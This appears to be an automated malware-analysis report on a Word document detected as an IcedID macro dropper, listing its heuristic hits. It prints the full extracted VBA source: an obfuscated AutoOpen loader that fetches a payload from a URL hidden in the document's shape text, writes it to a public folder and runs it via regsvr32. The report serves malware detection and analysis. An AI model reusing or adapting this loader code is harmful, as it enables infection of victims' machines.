MALICIOUS
290
Risk Score
Heuristics 7
-
ClamAV: Doc.Macro.ICEID1020-9781212-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.ICEID1020-9781212-0
-
VBA project inside OOXML medium 4 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
SuSHO(SwWmd + "." + "shell").exec (QgDuh) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set ZXGEu = VBA.CreateObject(jYTqM + "" + EvyDN) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 14199 bytes |
SHA-256: baa35d93d43267058f19e3f81fa5d0e05d4d56b0d90767840f4d30d6098a24e9 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "ORoCg"
Sub FqblH(IZnEv, Optional ByVal gvzBE As String = "c:\users\public\wskMa.txt", Optional ByVal EvyDN As String = "systemobject")
' Wending macron alines canaan squirm
' Metalanguage allergen inconsiderately
' Militarily tenet phlegmatically
' Forbears stinkers overeating
' Leaped
' Attitude
' Inexplicable
' Protectorates spain agakhan earwigs dictions
' Competes sinusitis prostates forthcoming
' Placentas publish bumptious pontificating climatic scuffed dumpy arabesques
' Equestrian postlude
' Illustrative
' Worst edginess zion
' Cain senators fastnesses arranging
' Troikas
' Endues harassed spied
' Misrepresentations earache virile
' Foreshores nightfall week sneaking primitiveness exploratory
' Monopolisation
' Bodes blunders patronesses christenings
' Ease intrauterine prohibited neural
' Deftness hillman graciousness mullioned
' Bolero aspirated lumber
' Shavings contains cells refusal
' Leisure lumping particularised dies
' Subfamily pairs
' Gossips clamoured crystallise
Set ZXGEu = VBA.CreateObject(jYTqM + "" + EvyDN)
' Math offcut interconnections
' Partitions illiberal unpretending ensuring
' Cuts
' Junta tory etchings inhuman
Set hHQnU = ZXGEu.CreateTextFile(gvzBE)
' Tablespoonfuls flowerpots dip
' Chunnel
' Lamed shoemakers nougats
' Unimpeachable scriptorium
' Uprating muff metal overhear helpings lumbers
hHQnU.WriteLine IZnEv
' Linguistics trumpeted
' Eviction settees
' Visible amending unrequited overcharged
' Obituaries atropine roughage replicable
' Indomitable
' Trepidations overlapping impersonated
hHQnU.Close
' Equitably extinct bicarbonate forewarn
' Freshening unsensational
' Extracting prostrates
' Arbiter jailers bobbed stalled perioperative tools
' Theme femininity
' Wheaten
' Rotators lyon refreshments demerit patronage elms
' Nicotine brokenly
' Cannibal delve eyeglasses drifted encyclopaedia
' Idle decrypted sketchbooks
' Wingers filial alternations
' Municipalities hourglass literatures
' Unblinkingly specious
' Circulates
' Ungrateful abase barricaded respecting sort
' Doubled
' Nominations guest indignantly
' Offered permuted stabilises washings
' Enjoin psalm quacks worthier
' Adsorbed homesteads musts bradawl
' Mayor durable unaffectedly loading emanation
' Alliterated
' Metronomic lamplight veg circumventing corporal
' Girlie thirstiest mara
' Keypads
' Commodore stonework utilise
' Lessee wrecks fanaticism twinkling
' Hypothesis structures keening dugouts
' Records tomb
' Blessings anagrams awful
' Tacitly similarity breasting mausoleum circularity
' Quarried chance deface
' Surveyor
' Battleground entertainers fundraising topped libyans
' Weaned
' Windswept ways chained dissect ides
' Brasserie browse
' Architecture bubble adroitly cinematic ophthalmologists backchat
' Hesitating corroborated
' Uncharged bunions
End Sub
' Unfirm backstairs eyelash
' Agendas muzzling maladjustment
' Schizophrenia
' Shamefaced ethnicity daily
Sub AutoOpen()
' Ranting
' Regionally design guardsman
' Schistosomiasis laryngitis
' Leaner
' Erection condescended
' Randomisation sensationally renewals mothered greatgrandmother
' Bombarded proverb
' Basque rang guidebooks pollster
' Freeforall
' Coxes scarily banana redo
' Thither
' Undesirably binomial kilometres uranus
' Smartened pirouetted criticised misconceived encomium
' Lawn laurels
' Boroughs turkey nonexistent
' Obsequious
' Taverns selflessly
' Limerick velvety
' Boycotted mystification exmembers exacerbates recurrent
' Windscreens
' Indigestible garrotte launch windmills
' Gully tormented sporadically percuss
' Aloofness duckling
' Fumigate reproduction nearer
' Disentangle peruvian implied
' Heartburn brightly monotony wolfwhistles cannery volunteer
' Quarried wagon of
Dim SnHhN As New jhXil
' Aspic wounded generosity
' Mischiefmakers labouring
' Daddy septicaemia mews routing bored workless
' Telltale thawed bankrupts
' Lazed slowdown doomed
' Seer
hXgDj = ""
' Attritional intermission
' Immensity tripoli spawned eversion
' Dishonest roomy encode postures chuckles elasticities
' Technocracy
' Jades deriders restyled acquisitiveness
' Glim etherised dissident reassessment
' Aphorist autocracies recoiling unravels bogeys vomiting tripwire
' Extrusion terrorism
' Urbanised
' Grammes solves pots rectums tapestry
IZnEv = SnHhN.QzgNW(IuSRt)
' Firefighting disingenuously
' Grovel bicentenary
' Nuptial imam
' Dirties
' Agar humblest ratifies
' Lash railing ajar proofreading
FqblH pLFNZ(IZnEv)
' Recombines reconstitute stratosphere
' Unionists endive
' Chairmanship
' Dinky microbe
' Percolate tunisian blaring anniversary capitalisation
' Amputations leveraged bagpipe
' Recuperation inertial bartering improbability
' Glycerol
' Bunker thenceforth
' Delimited puking simplest chance
' Piercer referee
' Twins evasively ambiguous
' Contra armrest
rynzL KyPVo(0) + "vr32 c:\users\public\wskMa.txt", "wscript"
End Sub
Function QSszr(iupob, htyEl)
' Unaccountable monsoons dualistic
' Entrapping soloists conglomeration
' Wiped isolators
' Divisions scantiest
' Involves placenta romany housekeeper wise wallets
QSszr = Split(iupob, htyEl)
End Function
Attribute VB_Name = "psVWp"
' Constructable unkept impregnating
' Brainpower clips recounting
' Abutment
' Bandwagon sieve consummated tortured escapees curtsying ordinands
Function pLFNZ(ztcAN)
' Tiptoeing ground
' Interrelatedness sneezed freakish carabinieri
' Elongation superstitiously scout tyrannies
' Gyroscopes aggressively hostess
' Tactics
pLFNZ = StrConv(ztcAN, vbUnicode)
' Openness birthplace lectured imperium
' Punctuation lance lefts
' Deism elided
' Ratatouille singularities
' Dignified redone manned
' Ingeniously consisting hydrothermal neuroscience unceremoniously
End Function
' Applicants
' Contraventions polyphonic
' Wretchedness utopias louvre lakeside
' Redistributing gum abysmal
Function rbmfg()
' Departmental devotion stretch quaked
' Tragedians runnersup nine plantation blacks
' Sociably hadrons gatekeeper preoccupations
' Psychoanalysis penitent
' Oppression
' Hew skittishness deceitfulness
' Fatal
' Obviating stokes
' Piazzas sighed remark ratrace softest
' Pelican amplifier
' Foyers cosseted
' Metropolitan
With ActiveDocument.shapes(1)
rbmfg = .AlternativeText
End With
End Function
' Speculating pagan annoying dispenser scrolling baklavas grafted
' Gawking lending boastfully
' Bronchi dads expedited
' Stargazing
' Certifiable
' Equinoctial garaged responses
' Batiks letterpress democratising cohabiting dynasts
Function KyPVo(jvkWk)
' Enquiringly kilo jagged humpback
' Repayable ameliorates misspellings
' Unauthenticated locks
' Commodity alludes underpricing sheathing restates
' Plaque offenders
' Traducer success abstractedly
' Demists commending
' Horridly
DbRCf = QSszr(rbmfg(), "~~~")
WtUBm = DbRCf(jvkWk)
KyPVo = WtUBm
End Function
Attribute VB_Name = "jhXil"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function DoTnM(qtOOS)
' Nightmarish sharpened soapy quoter
' Muggy authentically
' Sirloin handlebar
' Lunged
' Prelates anywhere biblically unbridged
' Abundantly clones ethylene gimmickry unelectable phobias
' Stratigraphic petting
' Idealist subcontract bandits perpetuation
' Adhesion sauce initialisation
' Watertable doc
' Fronted fitted
' Discontinued
' Slights shouter confectionery
KhZYo = qtOOS
HxvWc = Len(KhZYo)
For LWvXt = 0 To HxvWc - 1
' Miscalculate
' Floppiest dementia communicated inlets upon
' Virgil cupping communal ribaldry
' Mouthpiece
' Buoyed skein naomi
' Honesty outpointed expressive
' Realigning stagnating humanise gaits
' Comrade recess kidneyshaped
' Wretchedness dulled downbeat unpalatable glides spectroscopes exude
' Ammonia defrauding resizing squeals
' Parities upland internals toyed prove
' Cartwheel brutalities alluvia disputing tweeter retransmitting imitator
' Choppy trefoil tame torts
' Overbearing naturalised
' Withdrawals tidings diagrams reorientates reprogramme
' Reference bewail
' Declarative
' Hires
' Curing pawpaw dropping nooses
ugdIW = ugdIW & Mid(KhZYo, (HxvWc - LWvXt), 1)
Next LWvXt
' Benediction pancakes collegiate
' Authorities waive
' Streakier sawyer tinged maternity
' Certificated
' Cannily operatic hydroelectricity hillock
' Wended manfully
DoTnM = ugdIW
End Function
' Impracticalities contributing havoc petrochemicals quilting
' Carter acetone techniques allowances
' Brush scurries filter
' Icicles denying snooze sued brake
' Congruence sensibility beehives everlasting
Function QzgNW(DwSqO)
' Purging libations seemly
' Fundamental kilovolt
' Indoctrinations ablutions ices
' Delightedly introverts rapiers outlying invited
' Uncontrollable wireless premiere redundancy
' Unpublicised professes mortified whacked
Dim WrLMu As Object
' English victim budding
' Tensional previewed
' Bedpan untasted evaporator
' Assuage heckled unassailable
' Sapphires impedimenta indaba glitters decorated
' Bodybuilding thermal permanent diminishing municipalities
' Orient pluralistic
' Crosscheck straits ranis nurseryman
' Disclaims maturity plumbers include extensively
' Homogeneous fixated imperially guesswork
' Attendees visage
' Olympics slabs mystically condescendingly commandingly invariable
' Ascendency citruses wriggled alarmed
Set WrLMu = CreateObject(DoTnM(DwSqO) + "." + DoTnM(DwSqO) + "Request.5.1")
' Mainstream citation
' Bargepole flickers insurmountably
' Treasury giantism recalcitrance reliving
' Wideness faller bridleway cabinets valleys tonne
' Spectacles
' Resizing extrinsically retread
' Choristers profounder oxidants uncivil
' Underrate franchisor decant aching
' Enroute yeomanry fatten constant insecurely songsters diaconal
' Surreptitious prospectors octahedron treatable scrape
' Phytoplankton taints senhor stridently unequivocal
' Intangible remote malignantly
' Roarer pretence
' Speedier accommodating todies programme tenths
' Headroom
' Deceives
' Sunflower
' Quibbles
' Component flamboyant finances groaner pelicans underplay
' Hardening muscling uncollected sturdy
dJUre = KyPVo(1)
' Slurps defined commandeered deadon
' Wade dumped
' Personalised stimulating
' Engage plaza
' Spurning imperfectly proliferating
' Dangerousness unwrapping trustees towing
WrLMu.Open "GET", DoTnM(dJUre), False
' Administrated gymnasia
' Polymorphic birch disconnected riper
' Boisterous delegated
' Perfection forgoing diviner shiver trampling
' Tomorrow transform cocksure
' Modularise greetings vaults
' Alaska relations atropine grouses
WrLMu.Send
' Emissivity tastiest anatomy
' Meanie redecoration scoutmaster
' Rebellion cirrhotic sheepdogs jungle
' Infield ransacking
' Earphones cooking peseta anachronism
QzgNW = WrLMu.responsebody
End Function
Attribute VB_Name = "TBOXo"
Public Const IuSRt As String = "ptthniw"
Public Const jYTqM As String = "scripting.file"
Function SuSHO(FCQWk)
Set SuSHO = CreateObject(FCQWk)
End Function
Sub rynzL(QgDuh, SwWmd)
' Splintered tireless
' Modernisations shorn whinnying assertively
' Symbolists pottage unissued
' Appendicitis
' Antimatter barcode beans partake revaluations plucks
' Outbred cobwebby await
' Scone planned ravings stations theatricals
' Jersey secrete infrequency mallets bijoux forebrain
' Fornicate
' Followed tautologies pen
' Vertebrates wade semicircular missiles bladders braggart smothered
' Brethren interrogators shuttling quit fuzz
' Quarrelsome bricabrac abraham expanses gab
' Epitomises insufferably belfast turntable homogeneity
' Testimonies drifters
' Adverts noddy earholes
' Carcases bequeathed
' Unmannerly bathers expedition
' Poltergeist scooter duration rounds fervid
' Horsewhipped snipped assignation earthwards
' Lavatory carboniferous
' Voluminous porkchop
' Biosphere
' Concentric
' Mellifluous morose vicarages pyrotechnic
' Preening parapets
' Fundamental toil
SuSHO(SwWmd + "." + "shell").exec (QgDuh)
' Blamelessly postponement regrow
' Subjugated giantess shadeless elephantine needy
' Uncancelled grunt kindred
' Adulterate encyclopedias basin
' Exhumed subjective bagpiper karakul consorted
' Jittery judaic
' Unobservable aptitudes
' Handedness archdeacon weaved
' Trays teeth diffuse
' Failure northward
' Elysee oestrogens
' Footstool kennedy literals
' Obsesses billows ornately obstacles curvilinear
' Yolk
' Dissuade gloated maples reel
' Arabesques serialisations
' Nought hunt struts cosine mime
' Lascivious solvency splinters
' Materials suzerainty carapace schizophrenic
' Provisionally prance labs crusaded
' Lebensraum
' Condescending rescuers cads putted poliomyelitis indemnify
' Lauders overlay rescanning incriminates esthete
' Glens lushness debtors derisory aborigines
' Openminded intones reserves muscular frolics
' Teamed infrequently
' Outlasted
' Inshore foreland roomy unities legitimise
' Adaptive unwontedly funded smash
' Infractions evacuation unthinking
' Skewness wellintentioned subtitle
' Feature titling drape desktop uhuh emaciated
' Premised boreal lays
' Overshot
' Headlining values
' Grasslands
' Keeling domes
' Beginner deployed geysers
' Braying forgets
' Figural petition bromine accusing cracks
' Picker pinions perversely
' Walkabout basing executions grenadier
' Optical acquitting
' Shallots rouses shambled
' Blacklisted chaffing preambles loyalties congregation
' Undulate meditates tacit deity wreaks bigben remember
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 50176 bytes |
SHA-256: 4f4f415bf06d57b0046d628a655b0e15eb547db3ac9b8bcc6679c8cc46a861c7 |
|||
|
Detection
ClamAV:
Doc.Macro.ICEID1020-9781212-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.